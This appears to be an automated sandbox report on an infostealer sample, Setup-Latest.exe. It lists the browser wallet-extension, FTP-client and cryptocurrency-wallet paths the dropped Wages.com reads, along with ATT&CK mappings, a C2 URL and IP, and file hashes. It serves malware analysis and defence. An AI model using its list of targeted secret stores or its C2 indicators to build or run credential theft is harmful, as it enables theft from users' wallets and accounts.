Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior

      Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK matrix, listed per tactic (the leading number is the report's per-technique match count; techniques without a number are unmatched matrix cells):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 121 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd; Scheduled Task
Persistence: 1 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 12 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 11 Masquerading; 21 Virtualization/Sandbox Evasion; 12 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 DLL Side-Loading
Credential Access: 2 OS Credential Dumping; 11 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 21 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 3 Process Discovery; 13 File and Directory Discovery; 25 System Information Discovery; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 11 Input Capture; 1 Archive Collected Data; 31 Data from Local System; 1 Clipboard Data; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
Setup-Latest.exe | 19% | Virustotal |
Setup-Latest.exe | 19% | ReversingLabs |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\562639\Wages.com | 0% | ReversingLabs |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
https://zengardxen.cyou/api | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
zengardxen.cyou | 188.114.97.3 | true | true | | unknown
jnYxaqNNmUyHTVQ.jnYxaqNNmUyHTVQ | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://zengardxen.cyou/api | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/X | Wages.com, 0000000D.00000000.1763368679.0000000000985000.00000002.00000001.01000000.00000007.sdmp, Decorating.9.dr, Wages.com.1.dr | false | | high
http://nsis.sf.net/NSIS_ErrorError | Setup-Latest.exe | false | | high
https://www.autoitscript.com/autoit3/ | Volunteers.9.dr, Wages.com.1.dr | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | zengardxen.cyou | European Union | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1615219
Start date and time: 2025-02-14 16:54:20 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Setup-Latest.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@28/23@2/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 26
                • Number of non-executed functions: 39
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45, 4.175.87.197
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:55:21 | API Interceptor | 8x Sleep call for process: Wages.com modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.114.97.3 | engine.ps1 | malicious | FormBook | www.serenityos.dev/rmwo/
188.114.97.3 | PDF SCAN COPY P.O7767.exe | malicious | FormBook | www.actpisalnplay.cyou/oxsm/
188.114.97.3 | AGODA COMPANY PTE LTD.exe | malicious | FormBook | www.baurishu.info/6oy6/?_j=6nA47ZHp&FZQ=7xOMRooSSsdqiPLUwJdUBA7jSGBkvIlXa8t/xkLysZwhALyZ/D1DnA5RJCtzQ0mexpIl7jsdSrCncqt0u60b9lReTIu2hx5TfEdYnkD0kAiXAP2WKA==
188.114.97.3 | bHYg.exe | malicious | FormBook | www.actpisalnplay.cyou/3vjo/
188.114.97.3 | Payment -Advice-6UoSFOxOntvuu94-PDF.exe | malicious | FormBook | www.desktitle.homes/bc93/
188.114.97.3 | BINATONE LLC RFQ.Vbs.vbs | malicious | FormBook | www.trosky.lol/o88r/
188.114.97.3 | JJ0tnjLiDS.exe | malicious | FormBook | www.adventurerepair24.live/gc4d/
188.114.97.3 | Confirmation Receipt for ETF_20250211_HSBCEU314AX51920DEU.vbe | malicious | FormBook | www.actpisalnplay.cyou/c6as/
188.114.97.3 | (BBVA) SWIFT_consulta_de_operaciones 10-02-2025-PDF.exe | malicious | FormBook | www.timeinsardinia.info/50g8/
188.114.97.3 | swift copy.exe | malicious | FormBook | www.timeinsardinia.info/a84t/
                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | SPECIFICATIONS112025.exe | malicious | Snake Keylogger | 104.21.32.1
CLOUDFLARENETUS | https://notifications.google.com/g/p/ANiao5qKfpKGd2jYVQDb7vORoVGY96M_apQZWQcfuLgUh0GZyBJANTtYK9_noZQ1711qN-Nnm0DMf_B0c07RxsIpTsLOXIG6nNUkP7-522wWZZkizIeUQoaYMxfvubAPN7K6vgKfJCjpF3Y3VSFZPtNm5n34HM86QMFnOVYHFycjRojvprEeSViyQqV_RbPVd9Nh3y1jQx8FWiMJd_UXkRWlNs4 | malicious | Unknown | 172.67.75.11
CLOUDFLARENETUS | http://hep2go.com | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | SecuriteInfo.com.Win32.MalwareX-gen.16584.17867.exe | malicious | LummaC Stealer | 104.21.33.245
CLOUDFLARENETUS | SecuriteInfo.com.Win32.CrypterX-gen.27676.31428.exe | malicious | LummaC Stealer | 104.21.64.1
CLOUDFLARENETUS | https://click-v4.mainexclkdir.com | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | http://office.biofcnn.com/GrEkVrfg | malicious | HTMLPhisher, ReCaptcha Phish | 104.19.229.21
CLOUDFLARENETUS | https://click-v4.mainexclkdir.com | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://drive.google.com/uc?export=download&id=1CmHgECvh_EHGsZqLVn0a5drEg1A7U8vx | malicious | Unknown | 104.18.41.137
CLOUDFLARENETUS | http://hookersbaits.co.uk | malicious | Unknown | 104.17.25.14
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | SecuriteInfo.com.Win32.MalwareX-gen.16584.17867.exe | malicious | LummaC Stealer | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | SecuriteInfo.com.Win32.CrypterX-gen.27676.31428.exe | malicious | LummaC Stealer | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | Ux9pGQCe7d.exe | malicious | LummaC Stealer | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | t5vT1k9gg6.exe | malicious | Amadey, Healer AV Disabler, LummaC Stealer, PureLog Stealer, RedLine, Xorist, zgRAT | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | PO-989-34 MT.docx.doc | malicious | Unknown | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | HFLnponMjX.exe | malicious | LummaC Stealer | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | asdasdasdasd.docx.doc | malicious | Unknown | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | Lumma.exe | malicious | LummaC Stealer | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | SecuriteInfo.com.Win32.Evo-gen.7075.31767.exe | malicious | LummaC Stealer | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | 1w5RpHuliE.exe | malicious | Amadey, GCleaner, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader, Vidar | 188.114.97.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\562639\Wages.com | XKNN9fS4Tr.exe | malicious | Amadey, AsyncRAT, Cryptbot, PureLog Stealer |
C:\Users\user\AppData\Local\Temp\562639\Wages.com | qNXDfsU2K7.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\562639\Wages.com | H5S6rm5oQ9.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\562639\Wages.com | qNXDfsU2K7.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\562639\Wages.com | H5S6rm5oQ9.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\562639\Wages.com | ThsoAuzU1L.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\562639\Wages.com | ThsoAuzU1L.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\562639\Wages.com | AxQgcpYNXx.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\562639\Wages.com | nykfsekawddd.exe | malicious | Blackshades |
C:\Users\user\AppData\Local\Temp\562639\Wages.com | random.exe | malicious | Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, zgRAT |
Process: C:\Windows\SysWOW64\cmd.exe
File Type: data
Category: dropped
Size (bytes): 529571
Entropy (8bit): 7.999626419165469
Encrypted: true
SSDEEP: 12288:BWT1PcCV6PdbVjJ7qK9SuaKh8M48AJ4hlyHCpnDk9LB2NwPDH:i1UO6PdWKQKeF4hlycDk92wPDH
MD5: 3C2D7A5C987B05E3941DD6EFFD48FAA7
SHA1: BA99E1C7EE435ABC80058CE8A9472115082C31FB
SHA-256: 21EE5E1BA7E6CBF8B183A93E4CCA1EA9266C5CF03A24F4D47D5F5682D90849F4
SHA-512: 9E273F2A017DFAFEB876C26E3C8BAA490D8BB429BF2F7CBF8B61B0B731E166C3CAC0D4FD8E266CD93411603A4D1578D4F6C5ED536BC2EF0FE835EF35EF8D6943
Malicious: false
Process: C:\Windows\SysWOW64\cmd.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: modified
Size (bytes): 947288
Entropy (8bit): 6.630612696399572
Encrypted: false
SSDEEP: 24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5: 62D09F076E6E0240548C2F837536A46A
SHA1: 26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256: 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512: 32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: XKNN9fS4Tr.exe, Detection: malicious
• Filename: qNXDfsU2K7.exe, Detection: malicious
• Filename: H5S6rm5oQ9.exe, Detection: malicious
• Filename: qNXDfsU2K7.exe, Detection: malicious
• Filename: H5S6rm5oQ9.exe, Detection: malicious
• Filename: ThsoAuzU1L.exe, Detection: malicious
• Filename: ThsoAuzU1L.exe, Detection: malicious
• Filename: AxQgcpYNXx.exe, Detection: malicious
• Filename: nykfsekawddd.exe, Detection: malicious
• Filename: random.exe, Detection: malicious
Process: C:\Windows\SysWOW64\extrac32.exe
File Type: data
Category: dropped
Size (bytes): 133120
Entropy (8bit): 6.645929421393436
Encrypted: false
SSDEEP: 3072:gPtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj04:OCOMVIPPL/sZ7HS3zcNPj04
MD5: F698F3B6BD4FD4C90ED5935292EB2BFE
SHA1: 2DB7423AE317279AE1372FC3CF8FF2460656C38A
SHA-256: 7DCFF8D7A4B6CB306DC97F5F7DB57A36E56E13A1CFC17D3AB9836E9B5785CA59
SHA-512: 5D2601379130FA22D11FE1F9D6D399BFA4236066E8C0624CD2FA077792FDA27496D1663B22890A0DD1279E4ABC21C3AB28AF97791CF5679E178BA335BFB548E5
Malicious: false
Process: C:\Users\user\Desktop\Setup-Latest.exe
File Type: Microsoft Cabinet archive data, 489741 bytes, 10 files, at 0x2c +A "Volunteers" +A "Exhibits", ID 9105, number 1, 29 datablocks, 0x1 compression
Category: dropped
Size (bytes): 489741
Entropy (8bit): 7.9986047267742455
Encrypted: true
SSDEEP: 6144:DN9qPTbjHx/odUKCCYfpQ4AW6YaHzXt7r6jFZk3NAM/eXNwVySGOy6eCkgnnJCT:hkP7BoEp16YEXt/yFWAMmdwVHj7LnU
MD5: 8A00B16DC3B76945617792CC65186BF6
SHA1: 7ED328CCFD7E0E3617935E40FDD62958D86CD262
SHA-256: A38EF22B27199FFE04DCD923DF199C475AB63E2B31943AE72F3A37F6161349C1
SHA-512: 02EA60B55ACF4DE07D8DA8573290BD8F12B1E546A71050F979BF4CCC60F500EBE35F73EA0063130784CB0AC7023EB6228650664E51E22583627C13B875CF5358
Malicious: false
Process: C:\Users\user\Desktop\Setup-Latest.exe
File Type: data
Category: dropped
Size (bytes): 51200
Entropy (8bit): 7.996211037507376
Encrypted: true
SSDEEP: 1536:TFyNgUyeb/zTf5PlApu1UY/V7cIvfe1GV:42UHb/f5Psu9V7BvfN
MD5: 42198DA674D4400E907AEB635DB5BCD1
SHA1: 662EDDC12E98C75C654CB6A458AD31B1C9E8314E
SHA-256: F025D7132A2C77BD9C87C3707FEF4AB64CC162DF67B6727432C9831BDF11BBA9
SHA-512: EC32A212887F783CE1469EFBA7E440BEE22E07E591A11CE4ED6FB0634F04AD8897E4AF5CA33430B90B066894518F5FD2E2533306249B266A77BC218B9F3A1E82
Malicious: false
                                    Process:C:\Users\user\Desktop\Setup-Latest.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):78848
                                    Entropy (8bit):7.997501346535409
                                    Encrypted:true
                                    SSDEEP:1536:n7KTPXmnpm3M4oiEjfyqp7rUfbFMYafRxCTNARqbOxRl/TVRTsfIXKXqd:n7UASM4fEjJ7rb5LCpAkbOxRV/TaIaXU
                                    MD5:ACDA51733A848A5C4A9D1381EFFC0823
                                    SHA1:196639CA7174C9D1E817D042A5CC6703E4F7C804
                                    SHA-256:B4337E189ED65C122965008A94764C34FC61AD4796F62C3A407BB758D50FB482
                                    SHA-512:CC01602B242D832D38C86985FC64F7B92E1592E615EB46372A2D5ADCCCA0E599F6053262A98774774F0DCDF083C5BBF9618A6B678A8C53A9C2881A99B783EE8B
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):130048
                                    Entropy (8bit):5.114601341913769
                                    Encrypted:false
                                    SSDEEP:1536:rKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uS:b6whxjgarB/5elDWy4S
                                    MD5:36B2425AC79B2809A72223B7AE0CB33D
                                    SHA1:7919B6F47C5EA581150023C38FA002BBAC236C1B
                                    SHA-256:0E93C1BB7974B0786D02F13FE1639C6E6EC7272F8621AC48BD06A776FA89BC9B
                                    SHA-512:97549DCB3BF11301EC222AF0A4675E438373312F73EE7D2A43649F985E19545D69BDE65398B8FE8D8BEE0A0CADA92DBF6197E4F06CBC57AD38A4C6D306C94CF5
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):51200
                                    Entropy (8bit):6.742620741375466
                                    Encrypted:false
                                    SSDEEP:768:FdimkIXqURPN2mldrfa04VQv7Qf0VosQE7YmFdni8yDJ6bV6ybB:FyI7P4Cxi8q0vQEcmFdni8yDGVFB
                                    MD5:B5377B1F52750982FDD6CAD5B4E0AF57
                                    SHA1:FD12ABEEC698A60DDC8E1F8034FBCFC2ADF38ECD
                                    SHA-256:711A009FC9914B08D16B79013FA4E70A3DE2A50B83388B89A138AB2C54E0E62C
                                    SHA-512:8FCF1254EAD772C2D1D0C5425B81CE6EA7703872AB5A83E43ABB8DE54CA8FDCEE164D7F3873E8F8F1A44F88882E4A9ECC1F1F5BA658BBEF2643A62E07C9CEAD9
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):134144
                                    Entropy (8bit):6.62536518575565
                                    Encrypted:false
                                    SSDEEP:3072:4EoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLtG:4Eo3tb2j6AUkB0CThp6vmVnjpG
                                    MD5:E944BD961E9991CE3F56C2F01297F2DA
                                    SHA1:B44DEFD6FC45DEC2B78A737338252E5D3A6F6AF6
                                    SHA-256:285566E938AA29AA79B3F4091E00241C9B727C087F845782A062290D6D433556
                                    SHA-512:3E7ECF91C321C5DAFD2B794BEBC994D5B1128D227C48482B68EF5AFF3094C32339FBBD20DE788AAE9DED3C15655CFC3BF989FC8BF23770DA8831376ABE5B48AD
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\Setup-Latest.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):89088
                                    Entropy (8bit):7.998024929852032
                                    Encrypted:true
                                    SSDEEP:1536:uBOWz+HX19EjSTAq3O0PYu1O1UbwtxGSFI07qip9c4nX7x68GPEp+BAt:uBjy9G8Aq+4Yu1O1UEtxGSFIu/EPLAt
                                    MD5:76D4FF100C071819B2DE04CEAB6750DE
                                    SHA1:937989AF928F319B5A4A7D40A0A16489524856CC
                                    SHA-256:0F27EE47C58241BC7C6D5A1B2F7F1FE731236470F01E09CF2BD92368DD4A25FF
                                    SHA-512:1D14FC8C5C759781377011FA6B91FA835DA529FB967B55A6621847B2D8434D8233CFAF771CC304FED4D14CBFE05F1C8505B082E7326E7725DE21DAE642358133
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\Setup-Latest.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):79872
                                    Entropy (8bit):7.997941219659233
                                    Encrypted:true
                                    SSDEEP:1536:uneKSn9qjv0EsYW80dqjgcX4bzuMu4YLzkkr3+ZC2h1QLraxGH2EB:uNSSvRs38hmSDdzkkrI1+axGWe
                                    MD5:A066F57F4D5CAE1EA0B806C0E1587133
                                    SHA1:A4905E6345D73086429135F327A3C77F52090F90
                                    SHA-256:7B43310D8618C20E573DF349732318096A3CE767E961291063885B1FCD46F09A
                                    SHA-512:618478494C12809418207ABAE29159CB7D1128EB08D708F9DCB5DEDE933D4CA6AD488179E253DBAEDB4E3B51DDEF43ECAA82470BDAED53983D51165163501BF2
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2784
                                    Entropy (8bit):5.456016014097095
                                    Encrypted:false
                                    SSDEEP:48:A9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+MAyKnFH5:cSEA5O5W+MfH5S1CqlVJcI6ml5
                                    MD5:0BB664EEFFB2A88D13658DA64847AFEF
                                    SHA1:DF934CA820F5A29682259241CE704C8711B174FE
                                    SHA-256:2A00E6652DD2C4B5BE810FC60BE8DA1D6A75443C98387FF9A23C42FB7013E894
                                    SHA-512:EF6194A216815F9554B58F019897DF8F6068616B5AB5873DD6E7482445D68E68DA5AA4EEED9EE3C649AA61891AFA1B7BCF9903603D3843C64BD62286C597B4FD
                                    Malicious:false
                                    Preview:Yang........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B............................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\Setup-Latest.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):80896
                                    Entropy (8bit):7.997712148076008
                                    Encrypted:true
